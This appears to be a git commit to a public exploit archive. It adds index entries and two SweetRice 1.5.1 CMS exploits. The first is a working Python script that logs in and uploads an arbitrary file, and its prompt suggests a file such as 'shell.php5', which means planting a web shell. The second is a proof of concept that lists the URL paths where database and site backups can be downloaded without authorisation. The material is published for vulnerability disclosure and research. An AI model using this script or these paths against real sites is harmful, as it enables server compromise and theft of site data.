DB: 2016-11-07

2 new exploits SweetRice 1.5.1 - Arbitrary File Upload SweetRice 1.5.1 - Backup Disclosure
2016-11-07 05:01:24 +00:00 · 2016-11-07 05:01:24 +00:00 · 1ee96838d2
commit 1ee96838d2
parent c65daa1397
3 changed files with 89 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -30774,6 +30774,7 @@ id,file,description,date,author,platform,type,port
 34053,platforms/php/webapps/34053.txt,"ImpressPages CMS 1.0x - 'admin.php' Multiple SQL Injection",2010-05-28,"High-Tech Bridge SA",php,webapps,0
 34054,platforms/php/webapps/34054.txt,"GR Board 1.8.6 - 'page.php' Remote File Inclusion",2010-05-30,eidelweiss,php,webapps,0
 34055,platforms/php/webapps/34055.txt,"CMScout 2.08 - Cross-Site Scripting",2010-05-28,XroGuE,php,webapps,0
+40716,platforms/php/webapps/40716.py,"SweetRice 1.5.1 - Arbitrary File Upload",2016-11-06,"Ashiyane Digital Security Team",php,webapps,0
 34057,platforms/php/webapps/34057.txt,"wsCMS - 'news.php' Cross-Site Scripting",2010-05-31,cyberlog,php,webapps,0
 34058,platforms/multiple/dos/34058.txt,"DM Database Server - 'SP_DEL_BAK_EXPIRED' Memory Corruption",2010-05-31,"Shennan Wang HuaweiSymantec SRT",multiple,dos,0
 34059,platforms/windows/remote/34059.py,"Kolibri Web Server 2.0 - GET Request SEH Exploit",2014-07-14,"Revin Hadi Saputra",windows,remote,0
@ -30803,6 +30804,7 @@ id,file,description,date,author,platform,type,port
 34083,platforms/php/webapps/34083.txt,"Western Digital My Book World Edition 1.1.16 - 'lang' Parameter Cross-Site Scripting",2009-12-30,emgent,php,webapps,0
 34084,platforms/php/webapps/34084.txt,"L2Web LineWeb 1.0.5 - Multiple Input Validation Vulnerabilities",2010-01-06,"Ignacio Garrido",php,webapps,0
 34085,platforms/php/webapps/34085.txt,"WordPress Plugin Gigya Socialize 1.0/1.1.x - Cross-Site Scripting",2010-06-04,MustLive,php,webapps,0
+40718,platforms/php/webapps/40718.txt,"SweetRice 1.5.1 - Backup Disclosure",2016-11-06,"Ashiyane Digital Security Team",php,webapps,0
 34088,platforms/android/remote/34088.html,"Boat Browser 8.0 / 8.0.1 - Remote Code Execution",2014-07-16,c0otlass,android,remote,0
 34089,platforms/php/webapps/34089.txt,"Bilboplanet 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2014-07-16,"Vivek N",php,webapps,80
 34090,platforms/multiple/dos/34090.py,"Node Browserify 4.2.0 - Remote Code Execution",2014-07-16,"Cal Leeming",multiple,dos,0
--- a/platforms/php/webapps/40716.py
+++ b/platforms/php/webapps/40716.py
@ -0,0 +1,68 @@
+#/usr/bin/python
+#-*- Coding: utf-8 -*-
+# Exploit Title: SweetRice 1.5.1 - Unrestricted File Upload
+# Exploit Author: Ashiyane Digital Security Team
+# Date: 03-11-2016
+# Vendor: http://www.basic-cms.org/
+# Software Link: http://www.basic-cms.org/attachment/sweetrice-1.5.1.zip
+# Version: 1.5.1
+# Platform: WebApp - PHP - Mysql
+
+import requests
+import os
+from requests import session
+
+if os.name == 'nt':
+    os.system('cls')
+else:
+    os.system('clear')
+    pass
+banner = '''
+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
+|  _________                      __ __________.__                  |
+| /   _____/_  _  __ ____   _____/  |\______   \__| ____  ____      |
+| \_____  \\ \/ \/ // __ \_/ __ \   __\       _/  |/ ___\/ __ \     |
+| /        \\     /\  ___/\  ___/|  | |    |   \  \  \__\  ___/     |
+|/_______  / \/\_/  \___  >\___  >__| |____|_  /__|\___  >___  >    |
+|        \/             \/     \/            \/        \/    \/     |                                                    
+|    > SweetRice 1.5.1 Unrestricted File Upload                     |
+|    > Script Cod3r : Ehsan Hosseini                                |
+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
+'''
+
+print(banner)
+
+
+# Get Host & User & Pass & filename
+host = input("Enter The Target URL(Example : localhost.com) : ")
+username = input("Enter Username : ")
+password = input("Enter Password : ")
+filename = input("Enter FileName (Example:.htaccess,shell.php5,index.html) : ")
+file = {'upload[]': open(filename, 'rb')}
+
+payload = {
+    'user':username,
+    'passwd':password,
+    'rememberMe':''
+}
+
+
+
+with session() as r:
+    login = r.post('http://' + host + '/as/?type=signin', data=payload)
+    success = 'Login success'
+    if login.status_code == 200:
+        print("[+] Sending User&Pass...")
+        if login.text.find(success) > 1:
+            print("[+] Login Succssfully...")
+        else:
+            print("[-] User or Pass is incorrent...")
+            print("Good Bye...")
+            exit()
+            pass
+        pass
+    uploadfile = r.post('http://' + host + '/as/?type=media_center&mode=upload', files=file)
+    if uploadfile.status_code == 200:
+        print("[+] File Uploaded...")
+        print("[+] URL : http://" + host + "/attachment/" + filename)
+        pass  
--- a/platforms/php/webapps/40718.txt
+++ b/platforms/php/webapps/40718.txt
@ -0,0 +1,19 @@
+Title: SweetRice 1.5.1 - Backup Disclosure
+Application: SweetRice
+Versions Affected: 1.5.1
+Vendor URL: http://www.basic-cms.org/
+Software URL: http://www.basic-cms.org/attachment/sweetrice-1.5.1.zip
+Discovered by: Ashiyane Digital Security Team
+Tested on: Windows 10
+Bugs: Backup Disclosure
+Date: 16-Sept-2016
+
+
+Proof of Concept :
+
+You can access to all mysql backup and download them from this directory.
+http://localhost/inc/mysql_backup
+
+and can access to website files backup from:
+http://localhost/SweetRice-transfer.zip
+